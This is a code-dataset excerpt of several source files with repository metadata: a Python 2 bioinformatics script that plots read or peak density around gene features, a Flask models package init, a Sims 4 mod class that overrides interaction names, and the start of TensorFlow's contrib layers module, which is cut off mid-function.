hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f704f458109bda2f6012d3166ddc6ff6686bf0f4
| 12,306
|
py
|
Python
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | 1
|
2020-02-25T13:08:20.000Z
|
2020-02-25T13:08:20.000Z
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | 1
|
2020-02-25T13:16:03.000Z
|
2020-02-25T13:16:03.000Z
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
####################################################################################
### Copyright (C) 2015-2019 by ABLIFE
####################################################################################
####################################################################################
####################################################################################
# Date Version Author ChangeLog
#
#
#
#####################################################################################
"""
程序功能说明:
1.统计reads or peaks 相对于TTS,TSS,STARTCODON,STOPCODON的分布
程序设计思路:
利用gffutils和HTSeq包进行统计
"""
import re, os, sys, logging, time, datetime
from optparse import OptionParser, OptionGroup
reload(sys)
sys.setdefaultencoding('utf-8')
import subprocess
import threading
import gffutils
import HTSeq
import numpy
import multiprocessing
from matplotlib import pyplot
sys.path.insert(1, os.path.split(os.path.realpath(__file__))[0] + "/../../")
from ablib.utils.tools import *
from ablib.utils.distribution import *
if sys.version_info < (2, 7):
print("Python Version error: please use phthon2.7")
sys.exit(-1)
_version = 'v0.1'
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def configOpt():
    """Declare all command-line options and parse sys.argv.

    Prints the help text and exits when the script is invoked with no
    arguments at all.

    Returns:
        (parser, options, args): the OptionParser instance plus the parsed
        options object and any positional arguments.
    """
    parser = OptionParser('Usage: %prog [option] [-h]')
    # --- analysis-specific options --------------------------------------
    parser.add_option('-g', '--gff', dest='gff', action='store', type='string',
                      help='gff file,do not have to provide it if db is exited')
    parser.add_option('-d', '--db', dest='db', default='gffdb', action='store',
                      type='string', help='the gff database file to create or use')
    parser.add_option('-b', '--bamorbed', dest='bamorbed', action='store', type='string',
                      help='bam or bed file, Important: the bamfile\'s suffix must be ".bam"')
    parser.add_option('-w', '--halfwinwidth', dest='halfwinwidth', default=1000,
                      action='store', type='int', help='halfwinwidth,default is 1000')
    parser.add_option('-p', '--postype', dest='postype', action='store', type='string',
                      help='gene position type:tss,tts,startcodon,stopcodon,intronstart,intronend')
    parser.add_option('-o', '--outfile', dest='outfile',
                      default="distance2xxx_reads_density.txt", action='store',
                      type='string', help='gene expression file')
    parser.add_option('-n', '--samplename', dest='samplename', default='',
                      action='store', type='string', help='sample name,default is ""')
    # --- housekeeping options shared across the pipeline ----------------
    preset = OptionGroup(parser, "Preset options")
    preset.add_option('-O', '--outDir', dest='outDir', default='./', action='store',
                      type='string', help='output directory', metavar="DIR")
    preset.add_option('-L', '--logDir', dest='logDir', default='', action='store',
                      type='string', help='log dir ,default is same as outDir')
    preset.add_option('-P', '--logPrefix', dest='logPrefix', default='', action='store',
                      type='string', help='log file prefix')
    preset.add_option('-E', '--email', dest='email', default='none', action='store',
                      type='string',
                      help='email address, if you want get a email when this job is finished,default is no email',
                      metavar="EMAIL")
    # NOTE(review): default=True makes -Q a no-op (store_true can never lower
    # it); kept as-is to preserve behavior -- confirm whether default=False
    # was intended.
    preset.add_option('-Q', '--quiet', dest='quiet', default=True, action='store_true',
                      help='do not print messages to stdout')
    preset.add_option('-K', '--keepTemp', dest='keepTemp', default=False,
                      action='store_true', help='keep temp dir')
    preset.add_option('-T', '--test', dest='isTest', default=False,
                      action='store_true', help='run this program for test')
    parser.add_option_group(preset)
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    options, args = parser.parse_args()
    return (parser, options, args)
def listToString(x):
    """Join the items of *x* into a single string, each item followed by
    one space (so non-empty input yields a trailing space; empty input
    yields ''). Used to reconstruct the full command line for logging.
    """
    return ''.join(item + ' ' for item in x)
# Parse the command line once at import time; everything below keys off `opt`.
opt_parser, opt, args = configOpt()
# -p (position type) is the only strictly required option.
if not opt.postype:
    opt_parser.error('Option -p must be assigned.\n')
# Default the log directory to <outDir>/log/ when not given explicitly.
if opt.logDir == "":
    opt.logDir = opt.outDir + '/log/'
# Optional sample-name prefix ("<name>_") used in derived file names.
sample = ""
if opt.samplename != "":
    sample = opt.samplename + '_'
# When the user kept the default output name, derive it from the sample
# prefix and the chosen position type (tss/tts/...).
if opt.outfile == 'distance2xxx_reads_density.txt':
    opt.outfile = sample + 'distance2' + opt.postype + '_reads_density.txt'
# Input format is inferred purely from the file suffix: ".bam" -> bam,
# anything else is treated as bed.
intype = "bam"
match = re.search(r'\.bam$', opt.bamorbed)
if not match:
    intype = "bed"
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
scriptPath = os.path.abspath(os.path.dirname(__file__))  # absolute script path
binPath = "/".join(scriptPath.split("/")[0:-2])  # absolute bin path (two levels up)
outPath = os.path.abspath(opt.outDir)  # absolute output path
#os.mkdir(outPath) if not os.path.isdir(outPath) else None
# NOTE(review): directories are created via the shell; os.makedirs would avoid
# spawning a process and quoting issues with unusual path names.
os.system('mkdir -p ' + outPath)
logPath = os.path.abspath(opt.logDir)
#os.mkdir(logPath) if not os.path.isdir(logPath) else None
os.system('mkdir -p ' + logPath)
tempPath = outPath + '/temp/'  # temp dir under outPath (not created here)
# os.mkdir(tempPath) if not os.path.isdir(tempPath) else None
resultPath = outPath + '/result/'  # result dir under outPath (not created here)
# os.mkdir(resultPath) if not os.path.isdir(resultPath) else None
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def initLogging(logFilename):
    """Configure root logging: DEBUG and above are written to *logFilename*.

    When the --quiet flag is off, a second handler mirrors INFO-and-above
    records to the console using the same message layout.
    """
    message_format = '[%(asctime)s : %(levelname)s] %(message)s'
    time_format = '%y-%m-%d %H:%M'
    logging.basicConfig(
        level=logging.DEBUG,
        format=message_format,
        datefmt=time_format,
        filename=logFilename,
        filemode='w')
    if opt.quiet:
        return
    # Mirror INFO+ records to the console for interactive runs.
    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    console.setFormatter(logging.Formatter(message_format, datefmt=time_format))
    logging.getLogger('').addHandler(console)
# Timestamped log file: <logPrefix>log.YYYYMMDD.HHMMSS.micro.txt under logPath.
dt = datetime.datetime.now()
logFile = logPath + '/' + opt.logPrefix + 'log.' + str(dt.strftime('%Y%m%d.%H%M%S.%f')) + '.txt'
initLogging(logFile)
# Record the module docstring (program description) at the top of the log.
logging.debug(sys.modules[__name__].__doc__)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
logging.debug('Program version: %s' % _version)
# Log the reconstructed full command line for reproducibility.
logging.debug('Start the program with [%s]\n', listToString(sys.argv))
# Wall-clock start time; the footer section reports total runtime from it.
startTime = datetime.datetime.now()
logging.debug("计时器:Program start at %s" % startTime)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
### S
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
### E
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def main():
    """Aggregate per-chromosome read/peak coverage around the selected
    feature position (tss/tts/startcodon/...), write the density table
    and render a line plot through the shared R script.
    """
    print("Main procedure start...")
    # (Re)build the gffutils database only when a GFF file was supplied;
    # otherwise reuse the existing database at opt.db.
    if opt.gff:
        db = gffutils.create_db(opt.gff, opt.db, merge_strategy="create_unique", verbose=False, force=True)
    db = gffutils.FeatureDB(opt.db)
    # Watcher() comes from ablib.utils -- presumably installs a signal/child
    # watcher for the worker pool; confirm against that module.
    Watcher()
    pool = multiprocessing.Pool(processes=15)
    server = multiprocessing.Manager()
    # Shared dict: chromosome -> coverage list of length 2*halfwinwidth,
    # filled in asynchronously by the worker processes.
    dis = server.dict()
    for chr in db.seqids():  # NOTE(review): `chr` shadows the builtin
        # if chr != "chr1":
        #     continue
        # For BAM input, skip chromosomes absent from the BAM header
        # (bed input is not checked).
        if intype == "bam":
            chr_dict = readBamHeader(opt.bamorbed)
            if not chr in chr_dict:
                continue
        # print(chr)
        dis[chr] = [0 for x in range(2 * opt.halfwinwidth)]
        pool.apply_async(distributionToOnePointByChr,
                         args=(chr, opt.bamorbed, opt.db, opt.outfile, opt.postype, opt.halfwinwidth, dis))
    pool.close()
    pool.join()
    # Snapshot the managed dict before shutting the manager down.
    d = dict(dis).copy()
    server.shutdown()
    # Sum the per-chromosome windows into one overall int32 profile.
    profile = numpy.zeros(2 * opt.halfwinwidth, dtype='i')
    for chr in sorted(d.keys()):
        wincvg = numpy.fromiter(d[chr], dtype='i', count=2 * opt.halfwinwidth)
        profile += wincvg
    # pyplot.plot( numpy.arange( -opt.halfwinwidth, opt.halfwinwidth ), profile )
    # pyplot.show()
    # Write "<offset>\t<density>" rows for offsets [-halfwinwidth, halfwinwidth).
    os.chdir(opt.outDir)
    fout = open(opt.outfile, 'w')
    fout.writelines(
        "+distance\tdensity\n")
    n = 0
    for i in range(-opt.halfwinwidth, opt.halfwinwidth):
        fout.writelines(str(i) + '\t' + str(profile[n]) + '\n')
        n += 1
    fout.close()
    #cmd = "cd " + outPath + "&& R --slave < /users/ablife/ablife-R/Line_single_ggplot2.r --args " + opt.outfile + " " + sample + 'distance2' + opt.postype + '_reads_density ./ \n'
    # Render the density curve with the shared ggplot2 helper script.
    cmd = "cd " + outPath + "&& Rscript " + binPath + "/plot/Line_single_ggplot2.r -f " + opt.outfile + " -t " + sample + 'distance2' + opt.postype + '_reads_density -n ' + sample + 'distance2' + opt.postype + '_reads_density -o ./'
    os.system(cmd)
if __name__ == '__main__':
    main()
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# NOTE(review): the clean-up/reporting code below sits outside the __main__
# guard, so it also runs when this file is imported -- confirm that is intended.
if not opt.keepTemp:
    os.system('rm -rf ' + tempPath)
    logging.debug("Temp folder is deleted..")
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
logging.debug("Program ended")
# Report total wall-clock runtime as HH:MM:SS (relies on Python 2 integer
# division for the %d conversions).
currentTime = datetime.datetime.now()
runningTime = (currentTime - startTime).seconds  # in seconds
logging.debug("计时器:Program start at %s" % startTime)
logging.debug("计时器:Program end at %s" % currentTime)
logging.debug("计时器:Program ran %.2d:%.2d:%.2d" % (runningTime / 3600, (runningTime % 3600) / 60, runningTime % 60))
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# Optional e-mail notification when -E was given (sendEmail comes from ablib.utils).
if opt.email != "none":
    run_cmd = listToString(sys.argv)
    sendEmail(opt.email, str(startTime), str(currentTime), run_cmd, outPath)
    logging.info("发送邮件通知到 %s" % opt.email)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
| 33.715068
| 232
| 0.42719
| true
| true
|
|
f704f4cd9c7fb1284f93ea1a887f87bdb1ce825e
| 408
|
py
|
Python
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | 4
|
2020-10-06T17:15:32.000Z
|
2021-06-04T06:07:44.000Z
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | 10
|
2020-10-06T18:23:43.000Z
|
2020-10-12T00:26:05.000Z
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | null | null | null |
# This file structure follows http://flask.pocoo.org/docs/1.0/patterns/appfactories/
# `db` is initialized in api.models.base instead of api.__init__.py
# to prevent circular dependencies.
from .base import db
from .Email import Email
from .Person import Person
from .VideoInfo import VideoInfo
# Public API of the models package: every new model module must be imported
# above and its class name added to __all__ so star-imports pick it up.
__all__ = ["db", "Email", "Person", "VideoInfo"]
| 34
| 84
| 0.767157
|
from .base import db
from .Email import Email
from .Person import Person
from .VideoInfo import VideoInfo
__all__ = ["db", "Email", "Person", "VideoInfo"]
| true
| true
|
f704f52a0332da8f345d14dd4fef2d97a4463857
| 4,181
|
py
|
Python
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 118
|
2019-08-31T04:33:18.000Z
|
2022-03-28T21:12:14.000Z
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 15
|
2019-12-05T01:29:46.000Z
|
2022-02-18T17:13:46.000Z
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 28
|
2019-09-07T04:11:05.000Z
|
2022-02-07T18:31:40.000Z
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any, Union
from interactions.base.interaction import Interaction
from interactions.context import InteractionContext
from protocolbuffers.Localization_pb2 import LocalizedString
from sims.sim import Sim
from sims4.utils import flexmethod
from sims4communitylib.logging.has_class_log import HasClassLog
from sims4communitylib.mod_support.mod_identity import CommonModIdentity
class CommonInteractionOverrideName(HasClassLog):
    """CommonInteractionOverrideName()

    Mix-in that overrides the :func:`~get_name` function of
    :class:`.CommonInteraction`, letting subclasses supply a custom display
    name via :func:`_create_display_name`.

    .. warning:: Use together with :class:`.CommonInteraction`; inheriting
        from this class alone has no effect.

    """

    # noinspection PyMissingOrEmptyDocstring
    @classmethod
    def get_mod_identity(cls) -> Union[CommonModIdentity, None]:
        # No mod identity of its own; subclasses may override.
        return None

    def __init__(self) -> None:
        super().__init__()
        HasClassLog.__init__(self)

    # noinspection PyMethodParameters,PyMissingOrEmptyDocstring
    @flexmethod
    def get_name(cls, inst: Interaction, target: Any=None, context: InteractionContext=None, **interaction_parameters) -> Union[LocalizedString, None]:
        resolved = inst or cls
        try:
            # Prefer the context for sim/target resolution, falling back to
            # the instance (or class) when no context was supplied.
            name_source = context or resolved
            sim = name_source.sim
            name_target = target or name_source.target
            cls.get_verbose_log().format_with_message(
                'Creating display name.',
                class_name=cls.__name__,
                interaction_sim=sim,
                interaction_target=name_target,
                interaction=inst,
                interaction_context=context
            )
            custom_name = cls._create_display_name(
                sim,
                name_target,
                interaction=inst,
                interaction_context=context,
                **interaction_parameters
            )
            # A None result means the hook declined; fall through below.
            if custom_name is not None:
                return custom_name
        except Exception as ex:
            cls.get_log().error('An error occurred while running get_name of interaction {}'.format(cls.__name__), exception=ex)
        # Delegate to the vanilla implementation above Interaction in the MRO.
        return super(Interaction, resolved).get_name(target=target, context=context, **interaction_parameters)

    # noinspection PyUnusedLocal
    @classmethod
    def _create_display_name(cls, interaction_sim: Sim, interaction_target: Any, interaction: Union[Interaction, None]=None, interaction_context: Union[InteractionContext, None]=None, **interaction_parameters) -> Union[LocalizedString, None]:
        """_create_display_name(interaction_sim, interaction_target, interaction=None, interaction_context=None, **interaction_parameters)

        Hook for supplying a custom display name for an interaction.

        :param interaction_sim: The source Sim of the interaction.
        :type interaction_sim: Sim
        :param interaction_target: The target Object of the interaction.
        :type interaction_target: Any
        :param interaction: The interaction instance, or None when no instance is available. Default is None.
        :type interaction: Union[Interaction, None], optional
        :param interaction_context: The context of the interaction, or None when unavailable. Default is None.
        :type interaction_context: Union[InteractionContext, None], optional
        :param interaction_parameters: Extra interaction parameters.
        :type interaction_parameters: Any
        :return: The Localized String to display, or None to keep the original display name.
        :rtype: Union[LocalizedString, None]
        """
        raise NotImplementedError()
| 48.057471
| 242
| 0.717771
|
from typing import Any, Union
from interactions.base.interaction import Interaction
from interactions.context import InteractionContext
from protocolbuffers.Localization_pb2 import LocalizedString
from sims.sim import Sim
from sims4.utils import flexmethod
from sims4communitylib.logging.has_class_log import HasClassLog
from sims4communitylib.mod_support.mod_identity import CommonModIdentity
class CommonInteractionOverrideName(HasClassLog):
@classmethod
def get_mod_identity(cls) -> Union[CommonModIdentity, None]:
return None
def __init__(self) -> None:
super().__init__()
HasClassLog.__init__(self)
@flexmethod
def get_name(cls, inst: Interaction, target: Any=None, context: InteractionContext=None, **interaction_parameters) -> Union[LocalizedString, None]:
inst_or_cls = inst or cls
try:
context_inst_or_cls = context or inst_or_cls
interaction_sim = context_inst_or_cls.sim
interaction_target = target or context_inst_or_cls.target
cls.get_verbose_log().format_with_message(
'Creating display name.',
class_name=cls.__name__,
interaction_sim=interaction_sim,
interaction_target=interaction_target,
interaction=inst,
interaction_context=context
)
override_name = cls._create_display_name(
interaction_sim,
interaction_target,
interaction=inst,
interaction_context=context,
**interaction_parameters
)
if override_name is not None:
return override_name
except Exception as ex:
cls.get_log().error('An error occurred while running get_name of interaction {}'.format(cls.__name__), exception=ex)
return super(Interaction, inst_or_cls).get_name(target=target, context=context, **interaction_parameters)
@classmethod
def _create_display_name(cls, interaction_sim: Sim, interaction_target: Any, interaction: Union[Interaction, None]=None, interaction_context: Union[InteractionContext, None]=None, **interaction_parameters) -> Union[LocalizedString, None]:
raise NotImplementedError()
| true
| true
|
f704f5d9631a52161bb607794d67acaf0b67e1cb
| 129,671
|
py
|
Python
|
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-08T04:32:21.000Z
|
2017-09-08T04:32:21.000Z
|
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-12T19:41:26.000Z
|
2017-09-12T19:41:26.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
from tensorflow.python.layers.maxout import maxout
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
__all__ = ['avg_pool2d',
'avg_pool3d',
'batch_norm',
'bias_add',
'conv2d',
'conv3d',
'conv2d_in_plane',
'conv2d_transpose',
'conv3d_transpose',
'convolution',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'convolution3d',
'convolution3d_transpose',
'dropout',
'elu',
'flatten',
'fully_connected',
'GDN',
'gdn',
'layer_norm',
'linear',
'pool',
'max_pool2d',
'max_pool3d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'scale_gradient',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'spatial_softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu',
'maxout']
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
DATA_FORMAT_NCDHW = 'NCDHW'
DATA_FORMAT_NDHWC = 'NDHWC'
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
@add_arg_scope
def avg_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 2D average pooling op.

  Pooling is performed per image over the spatial dimensions only, never
  across the batch or channel axes.

  Args:
    inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
      `data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
      `data_format` is `NCHW`.
    kernel_size: A list of length 2: [kernel_height, kernel_width] of the
      pooling kernel over which the op is computed. Can be an int if both
      values are the same.
    stride: A list of length 2: [stride_height, stride_width]. Can be an int
      if both strides are the same.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # data_format was validated above, so the 'NC' prefix alone is enough to
    # tell the two layouts apart.
    channel_layout = ('channels_first' if data_format.startswith('NC')
                      else 'channels_last')
    outputs = pooling_layers.AveragePooling2D(
        pool_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=channel_layout,
        _scope=sc).apply(inputs)
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def avg_pool3d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NDHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 3D average pooling op.

  Pooling is performed per volume over the spatial dimensions only, never
  across the batch or channel axes.

  Args:
    inputs: A 5-D tensor of shape `[batch_size, depth, height, width,
      channels]` if `data_format` is `NDHWC`, and `[batch_size, channels,
      depth, height, width]` if `data_format` is `NCDHW`.
    kernel_size: A list of length 3: [kernel_depth, kernel_height,
      kernel_width] of the pooling kernel over which the op is computed.
      Can be an int if all values are the same.
    stride: A list of length 3: [stride_depth, stride_height, stride_width].
      Can be an int if all strides are the same.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
  """
  if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
    raise ValueError('data_format has to be either NCDHW or NDHWC.')
  with ops.name_scope(scope, 'AvgPool3D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # data_format was validated above, so the 'NC' prefix alone is enough to
    # tell the two layouts apart.
    channel_layout = ('channels_first' if data_format.startswith('NC')
                      else 'channels_last')
    outputs = pooling_layers.AveragePooling3D(
        pool_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=channel_layout,
        _scope=sc).apply(inputs)
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _fused_batch_norm(
    inputs,
    decay=0.999,
    center=True,
    scale=False,
    epsilon=0.001,
    activation_fn=None,
    param_initializers=None,
    updates_collections=ops.GraphKeys.UPDATE_OPS,
    is_training=True,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    data_format=DATA_FORMAT_NHWC,
    zero_debias_moving_mean=False,
    scope=None):
  """Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift"
  Sergey Ioffe, Christian Szegedy
  Can be used as a normalizer function for conv2d and fully_connected.
  Note: when training, the moving_mean and moving_variance need to be updated.
  By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
  need to be added as a dependency to the `train_op`. For example:
  ```python
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
      train_op = optimizer.minimize(loss)
  ```
  One can set updates_collections=None to force the updates in place, but that
  can have a speed penalty, especially in distributed settings.
  Args:
    inputs: A tensor with 2 or more dimensions, where the first dimension has
      `batch_size`. The normalization is over all but the last dimension if
      `data_format` is `NHWC` and the second dimension if `data_format` is
      `NCHW`.
    decay: Decay for the moving average. Reasonable values for `decay` are close
      to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
      Lower `decay` value (recommend trying `decay`=0.9) if model experiences
      reasonably good training performance but poor validation and/or test
      performance.
    center: If True, add offset of `beta` to normalized tensor. If False,
      `beta` is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    epsilon: Small float added to variance to avoid dividing by zero.
    activation_fn: Activation function, default set to None to skip it and
      maintain a linear activation.
    param_initializers: Optional initializers for beta, gamma, moving mean and
      moving variance.
    updates_collections: Collections to collect the update ops for computation.
      The updates_ops need to be executed with the train_op.
      If None, a control dependency would be added to make sure the updates are
      computed in place.
    is_training: Whether or not the layer is in training mode. In training mode
      it would accumulate the statistics of the moments into `moving_mean` and
      `moving_variance` using an exponential moving average with the given
      `decay`. When it is not in training mode then it would use the values of
      the `moving_mean` and the `moving_variance`.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional collections for the variables.
    outputs_collections: Collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    zero_debias_moving_mean: Use zero_debias for moving_mean.
    scope: Optional scope for `variable_scope`.
  Returns:
    A `Tensor` representing the output of the operation.
  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: If the rank of `inputs` is undefined.
    ValueError: If the rank of `inputs` is neither 2 or 4.
    ValueError: If rank or `C` dimension of `inputs` is undefined.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
